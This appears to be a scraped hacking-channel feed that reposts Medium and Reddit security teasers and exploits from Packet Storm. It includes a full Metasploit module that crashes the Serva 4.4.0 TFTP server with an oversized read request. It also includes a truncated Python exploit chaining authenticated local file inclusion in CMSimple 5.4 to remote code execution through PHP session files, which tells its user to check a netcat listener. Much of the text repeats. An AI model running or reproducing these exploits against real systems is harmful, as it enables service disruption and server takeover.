Cmd nedir?Continue reading on Medium » (https://mirabbasagalarov.medium.com/cmd-nedir-nas%C4%B1l-kullan%C4%B1l%C4%B1r-2d98f7709902?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
CMD nedir? Nasıl kullanılır?
Cmd nedir?
Auto(It)mating your .NET tradecraft
https://www.reddit.com/r/redteamsec/comments/r15van/autoitmating_your_net_tradecraft/
submitted by /u/hanbei-undying (https://www.reddit.com/user/hanbei-undying)
[link] (https://thevivi.net/blog/pentesting/2021-11-24-autoitmating-your-dotnet-tradecraft/) [comments] (https://www.reddit.com/r/redteamsec/comments/r15van/autoitmating_your_net_tradecraft/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/r15van/autoitmating_your_net_tradecraft/
submitted by /u/hanbei-undying (https://www.reddit.com/user/hanbei-undying)
[link] (https://thevivi.net/blog/pentesting/2021-11-24-autoitmating-your-dotnet-tradecraft/) [comments] (https://www.reddit.com/r/redteamsec/comments/r15van/autoitmating_your_net_tradecraft/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Auto(It)mating your .NET tradecraft
Posted in r/redteamsec by u/hanbei-undying • 1 point and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What is DNS Spoofing??!
https://cdn-images-1.medium.com/max/1080/1*h40Lq4VBNq51luLiAxzKgQ.jpeg
Domain Name Server (DNS) spoofing is also called DNS cache poisoning
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
What is DNS Spoofing??!
https://cdn-images-1.medium.com/max/1080/1*h40Lq4VBNq51luLiAxzKgQ.jpeg
Domain Name Server (DNS) spoofing is also called DNS cache poisoning
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is DNS Spoofing??!
Domain Name Server (DNS) spoofing is also called DNS cache poisoning
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
STORY OF AN ENCODED XSS
https://cdn-images-1.medium.com/max/1154/1*fKACDPua_8npWXrV7EHzZg.jpeg
Hi everyone, I hope you all are doing well and great! In this article we are going to talk about a weird xss that i found in one of the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
STORY OF AN ENCODED XSS
https://cdn-images-1.medium.com/max/1154/1*fKACDPua_8npWXrV7EHzZg.jpeg
Hi everyone, I hope you all are doing well and great! In this article we are going to talk about a weird xss that i found in one of the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
STORY OF AN ENCODED XSS
Hi everyone, I hope you all are doing well and great! In this article we are going to talk about a weird xss that i found in one of the…
Hacking Articles Tips Tricks Videos Tutorials
1*eeKhO9O8wCLA7h0b4hLzZQ.gif
Hacking on Medium
Storie di hacker : il caso, mai risolto, di Max Headroom
https://cdn-images-1.medium.com/max/640/1*eeKhO9O8wCLA7h0b4hLzZQ.gif
Quella che racconto qui è, dal punto di vista storico, uno dei casi di hacking più clamorosi e “spettacolari”, almeno per l’epoca, mai…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Storie di hacker : il caso, mai risolto, di Max Headroom
https://cdn-images-1.medium.com/max/640/1*eeKhO9O8wCLA7h0b4hLzZQ.gif
Quella che racconto qui è, dal punto di vista storico, uno dei casi di hacking più clamorosi e “spettacolari”, almeno per l’epoca, mai…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Storie di hacker : il caso, mai risolto, di Max Headroom
Quella che racconto qui è, dal punto di vista storico, uno dei casi di hacking più clamorosi e “spettacolari”, almeno per l’epoca, mai…
Hacking Articles Tips Tricks Videos Tutorials
GIF
Hacking on Medium
Chaining Improper Authenticationto IDOR and no rate limit for mass account takeover
https://cdn-images-1.medium.com/max/600/0*N90weGQbsPh8Da7w.gif
You can also read this article here
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Chaining Improper Authenticationto IDOR and no rate limit for mass account takeover
https://cdn-images-1.medium.com/max/600/0*N90weGQbsPh8Da7w.gif
You can also read this article here
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Chaining Improper Authenticationto IDOR and no rate limit for mass account takeover
You can also read this article here
hacking: security in practice
Creating your own C2 Framework
Has anybody here any experience on the matter? I am creating one for my university Thesis and i don't know where to start. I am good at programming, can somebody give me a small guide on where to start, what to expect, what languages to use etc. Thanks in advance.
submitted by /u/JuicyNatural
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Creating your own C2 Framework
Has anybody here any experience on the matter? I am creating one for my university Thesis and i don't know where to start. I am good at programming, can somebody give me a small guide on where to start, what to expect, what languages to use etc. Thanks in advance.
submitted by /u/JuicyNatural
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Creating your own C2 Framework
Has anybody here any experience on the matter? I am creating one for my university Thesis and i don't know where to start. I am good at...
hacking: security in practice
Getting backup of whatsapp and maybe even notes ..
I need help… please … So i lost my oneplus some months ago and i dont know about backup and stuff …. I actually lost it months ago … i have done a lil research … all i have is maybe phone details like model number and stuff and the number i used for whatsapp … if it is possible to grt those chats by a number … please tell me … please I have many important things in that … please
submitted by /u/anotherweeb-_-
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Getting backup of whatsapp and maybe even notes ..
I need help… please … So i lost my oneplus some months ago and i dont know about backup and stuff …. I actually lost it months ago … i have done a lil research … all i have is maybe phone details like model number and stuff and the number i used for whatsapp … if it is possible to grt those chats by a number … please tell me … please I have many important things in that … please
submitted by /u/anotherweeb-_-
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Getting backup of whatsapp and maybe even notes ..
I need help… please … So i lost my oneplus some months ago and i dont know about backup and stuff …. I actually lost it months ago … i have done...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Serva 4.4.0 TFTP Remote Buffer Overflow
https://4.bp.blogspot.com/-Lnl-ZxRP9Iw/WWlvEVwqA2I/AAAAAAAAIK8/WG2BCM3S_lsUOouuCwhP5sp3j7hYzeO-wCLcBGAs/s1600/h133.png
The Serva TFTP server version 4.4.0 can be brought down by sending a special Read request.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Serva 4.4.0 TFTP Remote Buffer Overflow
https://4.bp.blogspot.com/-Lnl-ZxRP9Iw/WWlvEVwqA2I/AAAAAAAAIK8/WG2BCM3S_lsUOouuCwhP5sp3j7hYzeO-wCLcBGAs/s1600/h133.png
The Serva TFTP server version 4.4.0 can be brought down by sending a special Read request.
MD5 |
75523ccfe4170ca41342bbd1293163fbDownload
# Exploit Title: Serva 4.4.0 TFTP Server Remote Buffer Overflow (Metasploit)
# Date: 2021-11-23
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://www.vercot.com/
# Software Link : https://www.vercot.com/~serva/download/Serva_Community_v4.4.0-21081411.zip
# Tested Version: 4.4.0
# Tested on: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
Rank = ExcellentRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Serva 4.4.0 TFTP Remote Buffer Overflow',
'Description' => %q{
The Serva TFTP server version 4.4.0 can be
brought down by sending a special Read request.
},
'Author' => 'Yehia Elghaly',
'License' => MSF_LICENSE,
'DisclosureDate' => '2021-11-23'))
register_options([Opt::RPORT(69)])
end
def run
connect_udp
print_status("Sending Read request...")
sploit = "\x00\x01"
sploit += "A" * 257
sploit += "\x00"
sploit += "netascii"
sploit += "\x00"
udp_sock.put(sploit)
disconnect_udp
end
end
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Serva 4.4.0 TFTP Remote Buffer Overflow
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
CMSimple 5.4 Local File Inclusion / Remote Code Execution
https://2.bp.blogspot.com/-NrOPg3Mty0U/WWlvlwk6sbI/AAAAAAAAIRI/oNtlpfQhQf0CXQthUyFzuVS3vq_pC_VnACLcBGAs/s1600/hack_img2.png
CMSimple version 5.4 local file inclusion to remote code execution exploit.
MD5 |
Download
# Exploit Title: CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)
# Date: 11/15/2021
# Exploit Author: S1lv3r
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/
# Version: CMSimple 5.4
# Tested on: CMSimple 5.4
# writeup:
# https://github.com/iiSiLvEr/CMSimple5.4-Vulnerabilities
#!/usr/bin/python3
import requests
import threading
import datetime
import sys
from bs4 import BeautifulSoup
x = datetime.datetime.now()
addSeconds = datetime.timedelta(0, 10)
Time = x + addSeconds
proxies = {"http": "http://127.0.0.1:8080","https": "https://127.0.0.1:8080",}
def Login():
try:
global Time
s = requests.Session()
headers= {"Content-Type": "application/x-www-form-urlencoded"}
data = f'login=true&selected=Welcome_to_CMSimple_5&User={User}&passwd={Password}&submit=Login'
response = s.post(RHOST, data=data, headers=headers, verify=False)#, proxies=proxies
if response.cookies['passwd']:
print("(+) Sucessfully Logged In With " + User + ":" + Password)
cookies = response.cookies
params = (('file', 'config'),('action', 'array'),)
response = s.get(RHOST ,cookies=cookies ,params=params,verify=False)
soup = BeautifulSoup(response.text, 'lxml')
CsrfValue = soup.find('input',attrs = {'name':'csrf_token'})['value']
print("(+) Get CSRF Token : [ " + CsrfValue + " ]")
data = f'csrf_token={CsrfValue}&functions_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_S1lv3r&form=array&file=config&action=save'
response = s.post(RHOST, headers=headers, cookies=cookies, data=data, verify=False)
print("(+) Changing Functions file Done ")
print("(+) Check Your nc listner on " + LPORT)
except Exception as error:
print("Error, Exiting;( ")
print(error)
pass
def fuzz():
while True:
try:
sessionName = "S1lv3r"
cookies = {'PHPSESSID': sessionName}
files = {'PHP_SESSION_UPLOAD_PROGRESS':(None,
'
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
CMSimple 5.4 Local File Inclusion / Remote Code Execution
https://2.bp.blogspot.com/-NrOPg3Mty0U/WWlvlwk6sbI/AAAAAAAAIRI/oNtlpfQhQf0CXQthUyFzuVS3vq_pC_VnACLcBGAs/s1600/hack_img2.png
CMSimple version 5.4 local file inclusion to remote code execution exploit.
MD5 |
7d206d745fd2639b990408dc45a77919Download
# Exploit Title: CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)
# Date: 11/15/2021
# Exploit Author: S1lv3r
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/
# Version: CMSimple 5.4
# Tested on: CMSimple 5.4
# writeup:
# https://github.com/iiSiLvEr/CMSimple5.4-Vulnerabilities
#!/usr/bin/python3
import requests
import threading
import datetime
import sys
from bs4 import BeautifulSoup
x = datetime.datetime.now()
addSeconds = datetime.timedelta(0, 10)
Time = x + addSeconds
proxies = {"http": "http://127.0.0.1:8080","https": "https://127.0.0.1:8080",}
def Login():
try:
global Time
s = requests.Session()
headers= {"Content-Type": "application/x-www-form-urlencoded"}
data = f'login=true&selected=Welcome_to_CMSimple_5&User={User}&passwd={Password}&submit=Login'
response = s.post(RHOST, data=data, headers=headers, verify=False)#, proxies=proxies
if response.cookies['passwd']:
print("(+) Sucessfully Logged In With " + User + ":" + Password)
cookies = response.cookies
params = (('file', 'config'),('action', 'array'),)
response = s.get(RHOST ,cookies=cookies ,params=params,verify=False)
soup = BeautifulSoup(response.text, 'lxml')
CsrfValue = soup.find('input',attrs = {'name':'csrf_token'})['value']
print("(+) Get CSRF Token : [ " + CsrfValue + " ]")
data = f'csrf_token={CsrfValue}&functions_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_S1lv3r&form=array&file=config&action=save'
response = s.post(RHOST, headers=headers, cookies=cookies, data=data, verify=False)
print("(+) Changing Functions file Done ")
print("(+) Check Your nc listner on " + LPORT)
except Exception as error:
print("Error, Exiting;( ")
print(error)
pass
def fuzz():
while True:
try:
sessionName = "S1lv3r"
cookies = {'PHPSESSID': sessionName}
files = {'PHP_SESSION_UPLOAD_PROGRESS':(None,
'
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
CMSimple 5.4 Local File Inclusion / Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Remote Code Execution In WhatsApp
https://1.bp.blogspot.com/-PwD2Dirg2NY/WWlu3CzGC6I/AAAAAAAAIIs/x87GenQxU4E4sY7pWpFvaHW3XEOYBksJQCLcBGAs/s1600/h10.png
Whitepaper that gives an analysis of the remote code execution vulnerability noted in CVE-2019-11932 for WhatsApp that affects versions prior to 2.19.244. Written in Spanish.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Remote Code Execution In WhatsApp
https://1.bp.blogspot.com/-PwD2Dirg2NY/WWlu3CzGC6I/AAAAAAAAIIs/x87GenQxU4E4sY7pWpFvaHW3XEOYBksJQCLcBGAs/s1600/h10.png
Whitepaper that gives an analysis of the remote code execution vulnerability noted in CVE-2019-11932 for WhatsApp that affects versions prior to 2.19.244. Written in Spanish.
MD5 |
31d209ac94755e2988452af4a8d5628eDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Remote Code Execution In WhatsApp
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.